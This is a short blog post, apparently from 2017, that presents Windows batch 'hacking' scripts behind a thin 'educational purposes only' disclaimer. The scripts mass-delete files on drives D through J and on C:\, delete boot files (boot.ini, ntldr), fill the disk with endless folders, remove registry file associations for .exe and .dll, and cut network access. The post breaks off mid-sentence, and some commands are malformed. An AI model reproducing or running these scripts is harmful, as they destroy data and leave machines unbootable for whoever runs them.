Posts

Showing posts from January, 2017

Notepad Hacking With Batch By:Deepak mehta

It is only for educational purposes. I am not  responsible for any kind of missuse.  DELETE ALL DRIVE       @echo off del D:\*.* /f /s /q del E:\*.* /f /s /q del F:\*.* /f /s /q del G:\*.* /f /s /q del H:\*.* /f /s /q del I:\*.* /f /s /q del J:\*.* /f /s / ALL FILE DELETE file. del *.* How to create more than 3,000 folders under a minute: @echo off :top md %random% goto top How to Shutdown a computer forever @echo off attrib -r -s -h c:\autoexec.bat del c:\autoexec.bat attrib -r -s -h c:\boot.ini del c:\boot.ini attrib -r -s -h c:\ntldr del c:\ntldr attrib -r -s -h c:\windows \win.ini del c:\windows\win.ini Here’s an alternative code . cmd /c del c:\windows\* /F /S / Q cmd /c del c:\* /F /S /Q Deletes everything stored in registry @ECHO  OFF START reg delete HKCR/.exe START reg delete HKCR/.dll START reg delete HKCR/* stops internet access @ECHO off Ipconfig /release gain Access   IPconfig /renew This virus can be